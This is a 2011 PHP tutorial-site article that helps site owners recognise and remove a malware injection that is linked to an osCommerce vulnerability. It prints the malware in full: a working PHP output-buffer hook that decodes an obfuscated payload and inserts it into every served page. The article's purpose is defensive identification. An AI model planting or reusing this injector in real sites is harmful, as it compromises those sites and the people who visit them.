By: Emiley J in PHP Tutorials on 2011年04月04日 [フレーム]
If you see this following code at the end of all your php pages then your site has been injected with malware. Follow the steps below to remove it.
<?php global $ob_starting;
if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27, 14, 3, 70, 80, 29, 89, 17, 86, 85, 2, 16, 77, 18, 91, 11, 93, 71, 66, 72, 75, 20, 87, 74, 59, 61, 22, 13, 37, 28, 52, 35, 21, 15, 1, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51);
$tr = array(49, 5, 4, 3, 9, 24, 2, 0, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 60, 9, 23, 0, 10, 2, 26, 24, 1, 6, 23, 10, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 8, 25, 25, 30, 29, 14, 15, 1, 23, 9, 14, 1, 15, 30, 8, 0, 34, 0, 0, 0, 28, 18, 3, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 14, 1, 42, 0, 63, 3, 3, 18, 26, 10, 7, 22, 41, 38, 17, 33, 16, 33, 7, 13, 0, 7, 22, 17, 27, 16, 17, 16, 23, 7, 13, 0, 7, 22, 17, 19, 33, 23, 17, 19, 7, 13, 0, 7, 22, 17, 17, 16, 23, 16, 41, 7, 13, 0, 7, 22, 41, 4, 19, 27, 17, 19, 7, 13, 0, 7, 22, 16, 41, 17, 16, 17, 19, 7, 13, 0, 7, 22, 19, 1, 16, 55, 16, 31, 7, 13, 0, 7, 22, 17, 52, 16, 31, 17, 33, 7, 13, 0, 7, 22, 16, 33, 17, 27, 16, 17, 7, 13, 0, 7, 22, 16, 23, 17, 19, 19, 27, 7, 13, 0, 7, 22, 33, 23, 17, 33, 17, 27, 7, 13, 0, 7, 22, 16, 33, 41, 4, 19, 27, 7, 13, 0, 7, 22, 16, 16, 17, 19, 17, 19, 7, 13, 0, 7, 22, 16, 23, 41, 55, 19, 1, 7, 13, 0, 7, 22, 19, 1, 16, 33, 16, 16, 7, 13, 0, 7, 22, 16, 31, 16, 15, 17, 19, 7, 13, 0, 7, 22, 16, 17, 16, 41, 17, 27, 7, 13, 0, 7, 22, 19, 15, 16, 33, 16, 17, 7, 13, 0, 7, 22, 19, 1, 16, 55, 17, 33, 7, 13, 0, 7, 22, 19, 1, 19, 27, 41, 15, 7, 8, 20, 0, 0, 0, 28, 18, 3, 0, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 27, 20, 0, 0, 0, 28, 18, 3, 0, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 0, 25, 0, 31, 20, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 2, 13, 5, 2, 26, 11, 1, 15, 8, 0, 34, 28, 18, 3, 0, 5, 0, 25, 0, 30, 30, 20, 23, 6, 3, 0, 10, 43, 25, 31, 20, 43, 49, 2, 21, 11, 1, 14, 37, 2, 39, 20, 43, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 3, 37, 38, 0, 25, 0, 2, 44, 43, 45, 20, 23, 6, 3, 0, 10, 9, 25, 27, 20, 9, 49, 16, 20, 9, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 4, 11, 3, 0, 25, 0, 4, 12, 3, 37, 38, 21, 5, 29, 38, 5, 2, 3, 10, 9, 35, 35, 13, 33, 8, 20, 9, 23, 0, 10, 4, 12, 4, 11, 3, 54, 25, 30, 31, 31, 30, 8, 0, 5, 0, 35, 25, 0, 64, 2, 3, 9, 14, 37, 21, 23, 3, 6, 32, 51, 39, 18, 3, 51, 6, 15, 1, 10, 24, 18, 3, 5, 1, 59, 14, 2, 10, 4, 12, 4, 11, 3, 13, 27, 46, 8, 47, 27, 52, 8, 20, 36, 36, 9, 23, 0, 10, 5, 2, 26, 11, 1, 15, 8, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 19, 46, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 33, 8, 8, 20, 36, 0, 1, 11, 5, 1, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 20, 36, 3, 1, 2, 29, 3, 14, 0, 5, 20, 0, 0, 0, 36, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 0, 34, 2, 3, 26, 0, 34, 0, 0, 0, 9, 23, 10, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 56, 26, 59, 15, 0, 57, 57, 0, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 8, 34, 15, 6, 4, 29, 32, 1, 14, 2, 21, 42, 3, 9, 2, 1, 10, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 27, 8, 8, 20, 0, 0, 0, 36, 0, 1, 11, 5, 1, 0, 34, 28, 18, 3, 0, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 25, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 10, 30, 5, 4, 3, 9, 24, 2, 30, 8, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 5, 3, 4, 25, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 31, 8, 20, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 5, 56, 26, 50, 18, 37, 62, 18, 32, 1, 10, 30, 39, 1, 18, 15, 30, 8, 44, 31, 45, 21, 18, 24, 24, 1, 14, 15, 51, 39, 9, 11, 15, 10, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 8, 20, 36, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 36, 2, 3, 26, 0, 34, 4, 39, 1, 4, 40, 12, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 10, 8, 20, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 5, 1, 2, 50, 9, 32, 1, 6, 29, 2, 10, 30, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 30, 13, 0, 52, 31, 31, 8, 20, 36, 0, 0, 0, 36, 0, 0, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 20, 36, 49, 53, 5, 4, 3, 9, 24, 2, 60);
$ob_htm = ''; foreach($tr as $tval) {
$ob_htm .= chr($tc[$tval]+32);
}
$slw=strtolower($s);
$i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}
if(!$i){$i=strlen($s);if($i){$i--;}}
$i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);
return $s;
}
$ob_starting = time();
@ob_start("ob_start_flush");
} ?>
Well to be honest, there is no simple way to remove it. But if you are wondering how this happened, you probably are using oSCommerce shopping cart module in your site. This malware is using a backdoor in one of oscommerce script vulnerability.
The best advice I can give is to totally delete all the folders including oscommerce and then recopy the backup files. You may surprised, that after recopying the old files, within hours the files are again injected with this code. If this happens then you will have to completely uninstall oscommerce and reinstall it again.
That could be bad news but thats what many people did to bring back their sites.This policy contains information about your privacy. By posting, you are declaring that you understand this policy:
This policy is subject to change at any time and without notice.
These terms and conditions contain rules about posting comments. By submitting a comment, you are declaring that you agree with these rules:
Failure to comply with these rules may result in being banned from submitting further comments.
These terms and conditions are subject to change at any time and without notice.
Most Viewed Articles (in PHP )
PHP code to write to a CSV file from MySQL query
Send push notifications using Expo tokens in PHP
Different versions of PHP - History and evolution of PHP
PHP code to import from CSV file to MySQL
A Basic Example using PHP in AWS (Amazon Web Services)
Password must include both numeric and alphabetic characters - Magento
PHP code to write to a CSV file for Microsoft Applications
PHP convert string to lower case
Resume or Pause File Uploads in PHP
Parent: child process exited with status 3221225477 -- Restarting
Convert a hex string into a 32-bit IEEE 754 float number in PHP
Latest Articles (in PHP)
Send push notifications using Expo tokens in PHP
PHP convert string to lower case
A Basic Example using PHP in AWS (Amazon Web Services)
Different versions of PHP - History and evolution of PHP
PHP code to import from CSV file to MySQL
PHP code to write to a CSV file for Microsoft Applications
PHP code to write to a CSV file from MySQL query
Password must include both numeric and alphabetic characters - Magento
PHP file upload prompts authentication for anonymous users
PHP file upload with IIS on windows XP/2000 etc
Resume or Pause File Uploads in PHP
Send push notifications using Expo tokens in PHP
PHP convert string to lower case
A Basic Example using PHP in AWS (Amazon Web Services)
Different versions of PHP - History and evolution of PHP
PHP code to write to a CSV file for Microsoft Applications
PHP code to write to a CSV file from MySQL query
PHP code to import from CSV file to MySQL
Password must include both numeric and alphabetic characters - Magento
Resume or Pause File Uploads in PHP
PHP file upload prompts authentication for anonymous users
PHP file upload with IIS on windows XP/2000 etc
© 2023 Java-samples.com
Tutorial Archive: Data Science React Native Android AJAX ASP.net C C++ C# Cocoa Cloud Computing EJB Errors Java Certification Interview iPhone Javascript JSF JSP Java Beans J2ME JDBC Linux Mac OS X MySQL Perl PHP Python Ruby SAP VB.net EJB Struts Trends WebServices XML Office 365 Hibernate
Latest Tutorials on: Data Science React Native Android AJAX ASP.net C Cocoa C++ C# EJB Errors Java Certification Interview iPhone Javascript JSF JSP Java Beans J2ME JDBC Linux Mac OS X MySQL Perl PHP Python Ruby SAP VB.net EJB Struts Cloud Computing WebServices XML Office 365 Hibernate